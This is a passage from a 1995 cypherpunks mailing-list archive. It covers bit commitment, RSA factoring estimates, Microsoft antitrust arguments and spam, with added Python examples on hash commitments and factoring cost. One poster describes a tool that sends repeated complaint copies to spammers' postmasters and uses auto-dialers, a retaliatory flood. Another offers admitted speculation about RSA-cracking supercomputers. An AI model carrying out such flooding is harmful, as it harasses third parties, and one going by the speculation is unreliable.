I am confused about bit commitment via one way hashing as described
in Schneier (1st ed, p 73)

h is a one way hash function.  This description from Schneier, except
that variables are changed so i don't need subscripts:

1. Alice has a bit b she wants to commit to. She picks random bit
	strings R and S, and sends Bob h(R,S,b),R

2. To verify commitment, she tells Bob S and b so he can verify the hash.

What i don't get is Schneier's claim:
``If Alice didn't send Bob R, then she could change the value of S
and then the value of the bit. The fact that Bob already knows R prevents
her from doing this.''

Can someone explain exactly how Alice cheats if Bob doesn't know R.
I can't see how she can alter R and S and b at all without being
able to produce hash collisions.

In essence, why doesn't the following work:

1. Alice has a bit b.  She picks a random bit string R and sends Bob
	h(R,b)

2. To verify, she tells Bob R and b.

Assuming Bob knows b is a single bit, how does Alice cheat without needing
to produce hash collisions for h.

thanks in advance for any help,
 - robbie
-- 
----------------------------------------------------------------------
      robbie gates      | it's not a religion, it's just a technique.
  apprentice algebraist |    it's just a way of making you speak.
    pgp key available   |       - "destination", the church.
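
Both commitment variants from the question above, written out as an added example (not part of the original post and not code from Schneier's book). SHA-256 as h, the length-prefixed field encoding, the 16-byte R and S, and all function names are assumptions of this example. It shows that in either variant a second opening of the same commitment to the other bit is by definition a collision in h, and that such a pair only becomes findable once the digest is truncated to 16 bits.

```python
import hashlib
import hmac
import os
from itertools import count


def _bit(b: int) -> bytes:
    if b not in (0, 1):
        raise ValueError("b must be a single bit")
    return bytes([b])


def h(*fields: bytes, nbytes: int = 32) -> bytes:
    """One-way hash over a tuple of byte strings.

    Assumptions of this example: SHA-256 plays the role of h, and every
    field is length-prefixed so that (R, S, b) has exactly one encoding
    (plain concatenation would let bytes slide between R and S).
    nbytes < 32 truncates the digest; used only by the weak-hash demo.
    """
    data = b"".join(len(f).to_bytes(4, "big") + f for f in fields)
    return hashlib.sha256(data).digest()[:nbytes]


# --- Variant 1: the scheme quoted in the post: Alice sends h(R,S,b) and R ---

def commit_rs(b: int, nbytes: int = 32):
    R, S = os.urandom(16), os.urandom(16)
    sent_to_bob = (h(R, S, _bit(b), nbytes=nbytes), R)
    kept_by_alice = (S, b)
    return sent_to_bob, kept_by_alice


def verify_rs(c: bytes, R: bytes, S: bytes, b: int, nbytes: int = 32) -> bool:
    # Bob recomputes the hash from the R he already holds plus the revealed S, b.
    return b in (0, 1) and hmac.compare_digest(c, h(R, S, _bit(b), nbytes=nbytes))


# --- Variant 2: the simplified scheme in the post: Alice sends only h(R,b) ---

def commit_r(b: int, nbytes: int = 32):
    R = os.urandom(16)
    return h(R, _bit(b), nbytes=nbytes), (R, b)


def verify_r(c: bytes, R: bytes, b: int, nbytes: int = 32) -> bool:
    return b in (0, 1) and hmac.compare_digest(c, h(R, _bit(b), nbytes=nbytes))


def find_equivocation(R=None, nbytes: int = 2):
    """Search for two openings of ONE commitment value to different bits.

    R=None  : simplified variant, vary R in h(R, b)
    R=bytes : variant 1 with R fixed, vary S in h(R, S, b)
    Returns (commitment, opening_for_0, opening_for_1). Any such pair is a
    collision in h, so the search only ends quickly when h is weak; the
    default 2-byte digest is deliberately weak to make that visible.
    """
    prefix = () if R is None else (R,)
    seen = ({}, {})  # seen[b][digest] = random string that opens to bit b
    for i in count():
        x = i.to_bytes(8, "big")
        for b in (0, 1):
            d = h(*prefix, x, _bit(b), nbytes=nbytes)
            if d in seen[1 - b]:
                opening = {b: x, 1 - b: seen[1 - b][d]}
                return d, opening[0], opening[1]
            seen[b][d] = x


if __name__ == "__main__":
    (c, R), (S, b) = commit_rs(1)
    print("variant 1 honest open:", verify_rs(c, R, S, b))
    print("variant 1 flipped bit:", verify_rs(c, R, S, 1 - b))

    c2, (R2, b2) = commit_r(0)
    print("variant 2 honest open:", verify_r(c2, R2, b2))
    print("variant 2 flipped bit:", verify_r(c2, R2, 1 - b2))

    d, r0, r1 = find_equivocation(nbytes=2)
    print("16-bit h, variant 2 opens both ways:",
          verify_r(d, r0, 0, nbytes=2), verify_r(d, r1, 1, nbytes=2))
    print("same pair under full SHA-256 collides:",
          h(r0, _bit(0)) == h(r1, _bit(1)))
```
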




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 14:23:30 PST
To: cypherpunks@toad.com
Subject: DCI_kgb
Message-ID: <199512202222.RAA09658@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The 12-20-95 WPost reports the Deutch/Perry move to
   kremlinize finance of the 13 spy agencies under the DCI 
   -- to transform the "vaguely associated medieval guilds 
   into a modern corporate team" -- and palmly slather $29 
   billion IC grease:

      National Forward Intelligence Program (CIA, NSA, DIA,
      NRO, parts of three G2s, DOE and FBI): $16bn.

      Tactical and Related Activities (warfighting support):
      $10bn.

      Joint Military Intelligence (cryptology, aerial recon,
      counter-narc and mapping): "Several billion."


   DCI_kgb (6 kgb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Wed, 20 Dec 95 15:18:01 PST
To: cypherpunks@toad.com
Subject: ex encrypted script
Message-ID: <199512202339.RAA05220@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Forgive me if this is a stupid question.

I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)

I have several simple scripts that are simple yet handle important realtime
call processing tasks and remote control operations.  These programs are my
programs but are running on a system that is dialed into by the vendor once
in a while.  

Is there a way to encrypt a script yet still allow it to be runnable?  I
know that the simple answer is to write it in C and compile it but I don't
have the means of doing that at the moment.  (i.e. there is no compiler on
the system)

I thought of a few simple protections but they all involve decrypting before
running.

                                Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 17:44:09 PST
To: cypherpunks@toad.com
Subject: Re: FTC Privacy Initiative (fwd)
Message-ID: <9512210144.AA04101@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jyri Kaljundi 

From: Internet Marketing Discussion List

        The US Federal Trade Commission has launched a "Privacy Initiative"
to investigate whether the information collected at websites (either that
affirmatively submitted by a visitor via a form or information collected
based upon a visitor's selection of pages at a site to reflect personal
interests) should be the subject of regulation by the FTC.  
...............................................

	"Hey, we can't just stand around here with nothing to do.
	Give us something to regulate - anything, pro or con; we
	must regulate something."

Dang!

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 14:58:22 PST
To: cypherpunks@toad.com
Subject: Re: KOD
Message-ID: <199512202258.RAA13656@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by dmandl@bear.com (David Mandl) on Wed, 20 
Dec  4:3  PM

>Can you reveal who they are?  No way am I going to buy 
>Newsweek to  find out.


Anyone out of Newsweek's range, return this msg, empty, to me 
to get the 50 mugshots, then ... sort out the living from the 
dead.


Best not to cypherdunk the already nym-shot victims. Privacy is 
paramount, bellows this list, no?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Dec 95 18:08:21 PST
To: attila <attila@primenet.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <Pine.BSD.3.91.951220193251.5597F-100000@usr5.primenet.com>
Message-ID: <199512210204.SAA26757@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


there's been MS flamewars on this list before, but Attila repeats
various snippets that I find highly objectionable.

cpunk relevance: operation of the free market

Gates' conquests can either be made out to be a failure of the free enterprise 
system or a success from it. the more I read whining complaints about MS's
dominance, the more I prefer the latter interpretation. perhaps power 
corrupts, but on the other hand failure clearly promotes whining. "you cannot
grow taller by chopping off the heads of others". 

I've seen so many people try to smear MS with innuendo, as if "enough people
being unhappy" at a company is ample evidence that there is "unfairness".
the marketplace is *not* fair. it rewards people who are in tune with it
disproportionately!! sometimes, *dramatically*so* as in the case with Gates.

consider this anecdote. 

a market for [x] gizmos does not even exist. a brilliant
person says, " I think people really need [x] gizmos. I'm going to make and
sell them. I'm going to find people who will help me, but if I can't find any
I'm going to do it all myself".

Gates is such a person and did it with PC OS'es and various windows 
applications (Excel, Word Perfect, etc.). he bet his entire future on
the idea that he knew what people wanted even when other companies disagreed.
 all companies had a chance to get on the windows bandwagon
and write decent software when he created this OS-- he was going around
and virtually begging companies. what did they say? "no, we aren't going
to take our chance with you. we don't think people really want your
@#$$%^&* gizmos". they snickered and sneered at him.

Gates succeeds, and sells a bazillion gizmos. he *creates* a market that
was not even in existence. or rather, he anticipates what people really
want, and the related markets begin to respond to him in a "positive
feedback loop".

suddenly all these companies cry foul in the greatest of hypocrisy. "Gates
has cornered the gizmo market!! he has 95% of it!!! why weren't we notified!!
no one should have such power!!"

the truth is that the playing field has always been level, but because Gates
is  such a brilliant genius, market anticipator, and gizmo producer, he
succeeds far beyond his or anyone else's wildest dreams.

"well, all things should be equal in the competition, unless someone is
succeeding more than somebody else, in which case we should penalize them
to make things more even" say his competitors.

the market has *given* bill gates his dominance. all the arguments about
him being "unfair" are absolutely bogus that I have seen. they amount to,
"Bill Gates is using tactics to sell more of his software than his competitors.
therefore, he's not being fair to everyone else who wants to sell their
software as well."

 hee, hee. I really love the free market. it's a delight
that Gates has put his money where his brain is, and in only 20 years built
one of the most successful companies in the entire history of business.
it's a tribute to the intelligence of the market and people who have the
sense to listen to it. MS has gained its dominance through the utmost of
hard work, and consumers vote with their $$$. whoever denies that consumers
know what they *really* want is an awfully pretentious and deluded person,
IMHO.

>The conundrum is trying to decide "when" a particular company is a 
>monopoly by either the classic definition of the Sherman and Clayton Acts 
>or an effective monopoly, or "bad" player as defined in the 
>Robinson-Patman act. 

pioneers are the ones with the arrows in their back. when they fail,
everyone sneers at them. when they succeed, everyone sneers at them and
says they succeeded through skullduggery. and then competitors refer to 
this *market* they had no hand in *creating* (the *hard* work is creating
a market, *anyone* can capitalize on one once created) as if they have
some "right" to it. 

Gates is the biggest teddybear
on the planet. those who are afraid of him only show they are afraid to
think as focused and seriously as he does all day. "gosh, we shouldn't have
to compete against someone who understands the market so well. what about
us? we are competition challenged!! we need a level playing field."

>    Bill Gates more than satisfies the requirements of defining a monopoly
>in Sherman and Clayton with 85% of the desktop locked in and an assault
>with "almost" standards on the open-system server market. NT is already
>garnering more than 25% of server installations in business --big
>business, since it will be "guaranteed" compatible with their desktop 95s. 
>The rest of us, stay with the real thing.

"no fair!!! Bill Gates has a monopoly on the gizmo market!!! he should be
stopped!!! restrained!! otherwise, no other gizmo companies will succeed!!"
you have a very short memory. only several years ago most of the population
of the planet was in total skepticism about the success of windows. now
that it has succeeded, everyone believes that this market should be carved
up to everyone that wants a piece of the pie. well, Gates helped "create" the
pie in the first place. 

>   Add to MS' virtually absolute domination of the desktop and its 
>impending domination of the commercial servers the fact that MS has 95% 
>of the front line office products --WP, Spreadsheet, Database, and mail 
>with the last be non-standard to long established rules and you do have a 
>problem to be considered. 

is anyone twisting people's arms to buy his software? are there a lack of
choices because other companies are simply choosing not to compete with
MS? if MS is giving customers what they want better than anyone else, (which
is proven viscerally by *cash*, people invariably put their money where
their mouths are) why is this "a problem to be considered"?

>  Will the market correct itself?

why does MS dominance require "correction"? the fact that you consider it
an anomaly shows how naive and ridiculous your position is. MS dominance
is absolutely no accident, and anyone who claims it was achieved through
anything less than honest competition is in my opinion a whining nonthinker
who is afraid of a true, free market realized.

>  Very questionable since MS rode to 
>its position on IBM's back and capitalized on IBM's failure to recognize 
>what they had stumbled into.

beautiful, isn't it? one man can "capitalize" on the idiocy of others. oh,
poor IBM. they didn't *get*it* even after half a decade, perhaps an entire
decade. the big bad Gates Wolf  sunk his fangs into IBM. yes, Gates is a
dracula. hee, hee. perhaps you would like to start a government program
to help poor companies that don't have the brains to understand a market
when it is screaming at them in their faces? lets call it the "dog eat dog"
welfare fund.

> IBM did not fall by the market rejecting IBM 
>--the market exploded with the PC for price and diversity reasons: you 
>can not compare direct entry, full screen aplications and 
>transportability of a PC against a looped, expensive main-frame 
>connection, if the boss even approves the cost.

IBM failed because they had no brain to recognize what was happening around
them. Gates did, and his success proves the correctness of his vision. 
the market is the force that will use or throw away companies as it sees
fit. it doesn't care about loyalty to a company that has lost the edge.

> Bill Gates
>has used his operating system dominance to force hardware vendors to ship
>MS products on _every_ machine, or pay substantial penalties in rates 2
>and 3 times larger for all MS products --cheap only if it is universal. 

Gates is free to demand as much payment for his products and services that
the market will bear. if the market decides it's highway robbery, Gates
will go the way of the dodo bird.  perhaps you think that the government
should now subsidize purchase of windows 95 so that everyone can get their
copy?

>   The real issue in DOJ v. MS was that although Bill complied with a 
>consent decree, he _immediately_ found other ways to apply the screw, and
>many of these newer terms are even worse, but more subtle. And, there is 
>no question the verbal threats have been significantly worse.

all far less than the slimy tactics used by his detractors to limit his
ability to compete freely in the market, such as all the "antitrust" laws
supposedly relevant to his situation.

> To software 
>vendors it is the threat of denial of technical information on GUIs and 
>APIs, to hardware manufacturers it is threats of economic sanctions,
>including publishing decertification of the platform for various WIN95 
>and NT compliant stickers, etc.

why should Bill be forced to do business with people who would love to
slit his throat? answer: he doesn't have to. he can flick his finger at
them. and if they misunderstand his right  to do this, they misunderstand
the essence of America.

>    Bill Gates is NOT an ethical businessman. If the fact was that Bill
>was able to garner his position from hard work, a better product, and a
>well-greased advertising and marketing organization would not justify the
>application of the classic Sherman and Clayton anti-trust rules; the
>market will either continue to accept them or not. 

that's absolutely what he has done, and none of your hocus-pocus flimflamery
can rebut this truth.

>    However, Bill has used his position of 85% in OSs not only to dictate 
>OS considerations, as bad as they are with DOS nothing more than a boot 
>sector virus and Windows a pretty program loader, but he has used this 
>position to dominate the applications market by bundling and forcing 
>machine integrators to include the MicroSoft applications in return for 
>the OEM discount on the operating systems.  

horrors!! you mean that if someone is successful, they have more influence
on the market?? *gasp*

> Preloading the market by those means is _not_ ethical or good
>business.

Gates is free to do whatever he likes. the market decides what is appropriate
by where it spends its money. so far, it supports him. are you going to argue
with everyone who spent money on MS products and say, "no, that's not really
what you wanted!!"  whose business of it is yours to limit the freedom of
consumer choice?

> Bill Gates _clearly_ violates the FTC provisions on ethical
>conduct and restraint of trade by a monopoly or quasi-monopoly position. 

"Gates is selling all the widgets and gizmos!!! no fair!!!"

>Why were nearly 30 OEMs represented anonymously in "friend of the court"
>briefs? --and the first thing Billy's (hired virtually every high end firm
>in SF) attorneys' did was subpoena the _names_ of the consortium under the
>rules of evidence --welcome to the "Kiss of Death." 

*gasp* -- finding out who is out to slit your throat. yes, it should be
mandatory that people can anonymously attack him (as you are doing) without
any possibility of consequence. let's just put a bag over his head and
let everyone take free punches. that would be appropriate, don't you think?

>    Personally, I think it is time to dismember Bill Gates --give him a
>choice of his OS group or his applications group and literally force him
>to sell all direct or indirect interest in the one he does not choose,
>plus forego any involvement. 

unfortunately, your puffhead arguments, falsehoods, innuendoes
 and hallucinations are beginning to grip people who matter. in fact
it is becoming quite trendy to besmirch MS.

>Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound 
>gorilla has not paid attention in history classes:

anyone who thinks that business involves charity for the intellectually
challenged has not paid attention to reality of the free market.

>	power corrupts
>	    absolute power corrupts absolutely.

funny how this statement is always assumed to apply to microsoft, not to
the companies that are trying to anonymously slash his throat in courts as a 
desperate resort when they have failed the egalitarian test of the marketplace.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Dec 95 18:06:40 PST
To: cypherpunks@toad.com
Subject: Surprise telecommunications bill?
Message-ID: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


While watching the national news (NBC, I think) they mentioned that there
had been a "surprising agreement on a telecommunications bill".  From the
sparse description, it sounded pretty nasty. 

Does anyone have any additional information on this?

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 15:28:01 PST
To: harmon@tenet.edu (Dan Harmon)
Subject: Re: [NOISE] revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
Message-ID: <199512202327.SAA10742@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dan Harmon writes:
> Perry,
> 
> the only crypto code you seem to do is the unintelligible postings
> that you send to the list.

Keep this irrelevant crap off cypherpunks.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 15:37:18 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <199512202337.SAA10846@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous "Bill Gates" writes:
> I'm not trying to start a flame war. 

Bullshit. 

[inconsequential prattle elided]

This thread is completely off-topic. Besides, we've gone through all this on
the list before. Let's not continue it. We all have more productive things
to do with our time.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 20 Dec 95 15:45:25 PST
To: cypherpunks@toad.com
Subject: NTT & electronic "cash"
Message-ID: <01HZ1GUUJERK8Y52ZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This qualifies as one of the most uninformative news items I've seen
from Reuters. Anyone know any substantive info on their process?
	-Allen

---------------------
   Reuters New Media
   
   _ Wednesday December 20 2:04 PM EST _
   
NTT Says Develops Secure Electronic Cash System

   
   
   TOKYO- Nippon Telegraph and Telephone said today that it has developed
   a secure electronic cash system which can be used for settling
   transactions on the Internet and in daily life using smart cards.
   
   "The system has very secure algorithms, and that makes fraudulent
   uses of the system very difficult," NTT researcher Mikio Suzuki
   told Reuters.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Dec 95 16:12:29 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <9512210012.AA19612@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think this conversation is getting silly even by net.standards.

On the one hand we have the screaming libertarians with a bunch of 
wedged political notions about property. On the other we have what 
appear to be arch anti-capitalists claiming that nobody who earns
a living out of crypto can be a cypherpunk. What is really strange
is that these appear to be the _same_ people.

Now I'm not one for supporting corporativism but consider this, most
if not all of the technical contributors to this list who can earn
money from their crypto knowledge do so. Matt and Jeff are not alone
in being paid for their abilities.

Another thing is that many of us are also into government contract
work up to their necks. The Web consortium is funded partly through
an ARPA grant. MIT is practically floating on government subsidies.
Yes this is where your tax dollars go, learn to love it or die 
bitching.

The point is that the tourist element who gripe on about nothing other
than their political views and never contribute any technical input are
not the people that make the list work. People like Matt and Jeff are
the people who make the list worthwhile.


		Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 11:16:39 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: (fwd) Junk email address collection (from a junk emailer)
In-Reply-To: <Pine.ULT.3.91.951219210009.8207F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.91.951220184848.5597E-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Rich Graves wrote:

> Personally, I think anyone who uses dejanews as a way to grep Usenet is
> an idiot, but since this idiot actually did spend several hours doing so,
> and then sent unsolicited commercial email to several thousand people,
> it's worth listening to him. 
> 
	[snip]

    [START] <attila>
	"forcing" a change on DejaNews to strip addresses would defeat
    the "redeeming" value of such a database. Since I, like many, 
    occasionally fall into the trap of opening my response before
    clutching in my brain, I used DejaNews to "count" the gaffes! 
    Fortunately, none on that search, just the usual sloppy keyboard entry.
	and, coming down on DejaNews just puts the fire out in just one 
    room of a conflagration. 
    [CONTINUE]

> Here it is:
> 
> When one of these mailers goes to do a search (and from what I hear, many
> of them do it on regular intervals to get new names) they cannot do a TERSE
> search. Why?  Because it cuts off the email addresses if you notice the
> output.  They cannot obtain addresses from this data.
> 
> So what do they do?  They do a VERBOSE search and this way the email
> addresses are completely listed.
> 
> Make a change to this VERBOSE search option so that it will only list the
> partial email address, and you will eliminate THOUSANDS, if not millions of
> unwanted email messages on the Net.
> 
> I guarantee if they made this change to the site it would make a HUGE
> difference.  From what I hear, most newsreaders only list news post lists
> by "author" and not by email address, so these companies cannot easily
> strip names through regular newsgroup programs, and must use a service
> (like Deja News) to compile large email lists.
> 
	[snip]

    [START] <attila>
	Searching with a news reader message by message would be more than
    painful!  all they need to do to obtain names from any newsgroup 
    is to scan the entire news base, or groups of interest. It took me 
    less than a minute to strip names from the alt.religion tree.
	I don't think the spammers are too worried about adding a few names 
    when groups are sorted by interest anyway.

	for amusement, I have started to code a simple program which
    takes a feed from procmail where known spammers are listed and it 
    prepends a message about spamming and sends 1 - n copies to the 
    offenders' PostMaster.  ...and, I will send them from my own address 
    as a token of my affection....

	The only aggravation is adding offender to procmail after finding 
    the source as many are using remailers.  If they have 800 numbers, 
    there are always auto-dialers with a message.. ..

	I hate to waste the bandwidth, but the spammers are getting out 
    of hand and procmail -> /dev/null is less than satisfying!

    [END] <attila>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 20 Dec 95 16:35:58 PST
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <199512210039.TAA24305@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jason Rentz wrote:

| Forgive me if this is a stupid question.

Hmmm.  Will you pay us?

| I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)
[...]

| Is there a way to encrypt a script yet still allow it to be runnable?  I
| know that the simple answer is to write it in C and compile it but I don't
| have the means of doing that at the moment.  (i.e. there is no compiler on
| the system)
| 
| I thought of a few simple protections but they all involve decrypting before
| running.

	Ever hear of chmod?  chown?
Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 20 Dec 95 16:55:57 PST
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512210053.TAA11344@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First, thanks for the obvious 'kind' thoughts Tim... It's heartening that
you took the time to add some substantial info to the thread. However...

> On 12/18/95 At 12:36 AM -0500, Timothy C. May wrote:

> >What caught my attention was the architecture.
> >
> >A "hybrid design linking two supercomputer processors with an
> >array of HALF A MILLION inexpensive processors" that were
> >designed by the U.S. government laboratory affiliated with the
> >NSA. The same chip house that brought us Clipper.

> First, half a million chips is not that big a deal...the Connection Machine
> had up to 64,000. Very few cryptographic problems of interest to us will be
> affected by a mere factor of a million or so.

O.K. Just a factor of 16 increase over the CM architecture right? Not knowing
the computational capabilities of the individual processors, it might be
difficult to say what the machine is capable of. Wouldn't that have some
bearing?

> Second, there was work on a "processor-in-memory" architecture, in
> conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
> what you are thinking of?

I didn't mention a 'processor-in-memory' architecture and neither did the NYT
article. Don't know about any other company involvement, just CCC and NSA.

> Third, all avenues of continued funding having fallen through, Cray
> Computer (not Cray Research, of course) was shut down and assets
> liquidated. I haven't heard what's become of Seymour, though. (He is
> undoubtedly an asset, but I doubt the Agency would have him liquidated.)

You mean the avenues that are of PUBLIC record. The possibility could always
exist that the development continues 'in-house'. It wouldn't be the first time
that sort of move has been played.

> >I've not kept up with the "ultimate" demise that eventually
> >befell Cray Computer Company, but the October 16 FBI filing
> >on capacity for Digital Telephony got me thinking back to this
> >article. 1% seems like a rather huge need for horsepower. And
> >what if GAK doesn't fly? And the widespread use of hard crypto
> >just keeps increasing?

> The tightly-coupled supercomputers are hardly needed for these sorts of
> problems.

You mean the problem of data collection? Well, it's true that this would be a
misuse of a supercomputer's specialized talents.

> >This kind of machine could, in theory:
> >
> >1) Implement ALL Clipper(II) based Key Escrow functionality in
> >   silicon (the easy part) AND allow for simultaneous decrypt and
> >   surveil of 'who knows how many' Clipper based data streams.

> Huh? First, what evidence do you have for this claim? Second, who cares?
> Implementing Clipper in a Cray Computer machine--why bother?

[Rant mode on]
Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory
probably has holes you could drive a FLEET of Mack trucks through. I have NO
evidence. I'm not sure WHO would care. I'M A PARANOID DELUSIONAL PSYCHOPATH!
O.K. well maybe not that last part... but I'm asking the questions, remember?
I said I'm new here, so if you're going to blow holes in my pet theories, then
do me the 'kindness' of using an accurate weapon... that's why I posted...

> As to the claim that a million-processor machine could do this, you need to
> work out the math. (If a backdoor exists, or the LEAF has been gotten, a
> supercomputer is not needed....)

Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would
YOU build a machine like this? What could POSSIBLY be its capabilities?
Speculate with me for a moment... *_take a chance_*.

> >2) Implement general RSA based Prime Factoring functionality in
> >   silicon (the not so easy part) AND allow massively parallel
> >   decrypt and surveil of 'who knows how many' RSA/etc. based
> >   data streams.

> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> has two factors.)

Yes, my terminology sucks! But you get the drift don't you? Math is not a
strength of mine, I only know in very general terms what is involved (why,
then, am I even bothering to bring this up?). Because I AM however, VERY
concerned in the continual erosion of privacy rights in all forms of
communications, electronic and otherwise.
[Rant mode off]

> If you mean using supercomputers to brute force the general factoring of an
> RSA modulus, this is nonsense. While there may be math shortcuts we don't
> yet publicly know about which make factoring easier than we currently
> think it is, a mere million or even a billion processors will not make a
> dent in the factoring of, say, a 700-digit modulus. See the tables in
> Schneier and elsewhere for some estimates of factoring efforts needed.

Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the
tables that you refer to. Where may I find them? (LOL)

> >3) Implement it all, AND 'on-line' transaction based surveillance
> >   via the FBI's 1% capacity infrastructure.

> Let's see some numbers. (On second thought, let's not.)

No, I've already said that math is not a strength I possess. I've wondered
about the ability of the FBI to count on ten fingers and ten toes given some
of the justification that I've read for this capacity figure...

> >Chilling... Who needs key escrow (or RSA private keys) when
> >you've got a massively parallel prime factoring machine. What if
> >GAK was to become a 'non-issue'? How fast do you think a machine
> >such as this could factor RSA 129?

> Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so
> the computation for a million SPARC-equivalent (or even
> UltraSPARC-equivalent) can be done.

Sorry... I asked the question... and your speculation is (I would hope) MUCH
more accurate than mine. Again, math is not a strength of mine.

> When you've done this, and concluded that RSA-129 could be done in, say, X
> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> centuries it will take. (Hint: Rivest and Schneier have done these
> calculations....)

Yes, I believe that I've read Rivest's paper on the statistical probabilities.
I've never really believed in statistics, AND I'm sure you don't have the time
to convince me Tim (I'm sorry if I've been less than reverential about this,
but I'm from Illinois which is right next door to Missouri).

> --Tim May, who fears that he's just been trolled by Derek Atkins

No Tim, you have not... but on another note...

> It'll be _many_ years before a 384-decimal-digit number is factored, I
> suspect. Let alone a 600-digit modulus, with or without the mysterious
> "transphaser" technology mentioned by Anitro.

The "transphaser" is an optical equivalent to the transistor. It is a quantum
threshold optical switch, but it is not a 'mystery'. You should read Scientific
American more often ;>

O.K. I'm done with this line of discussion, you may however, continue to
     elaborate as I will, no doubt, continue to read...

Anitro

"I have a little shadow that goes in and out with me,
 And what can be the use of him is more than I can see" R. L. Stevenson




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNiv8SoZzwIn1bdtAQHyewF+OXlM8KueHrCynKGhjqXy8eHLSonn12Df
vcAdDoaajoi5t7CfY9lP/+FNeO2JKE+v
=SIKC
-----END PGP SIGNATURE-----
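
The calculation Tim May asks for in the message above ("do the math"), worked as an added example; it is not code from the thread or from any of its participants. Assumptions not stated in the thread: the commonly cited figure of about 5000 MIPS-years for RSA-129, a constructed 100 MIPS per processor, and the number field sieve heuristic running time with its o(1) term dropped (RSA-129 itself was factored with the quadratic sieve), so the results are order-of-magnitude only.

```python
import math

# Assumed calibration point (not given in the thread): the commonly cited
# ~5000 MIPS-years for the 1994 factorization of RSA-129 (129 decimal digits).
RSA129_DIGITS = 129
RSA129_MIPS_YEARS = 5000.0

# Heuristic number field sieve running time, o(1) term dropped:
#   L_n[1/3, c] = exp(c * (ln n)^(1/3) * (ln ln n)^(2/3)),  c = (64/9)^(1/3)
GNFS_C = (64.0 / 9.0) ** (1.0 / 3.0)

MINUTES_PER_YEAR = 365.25 * 24 * 60


def ln_from_digits(decimal_digits):
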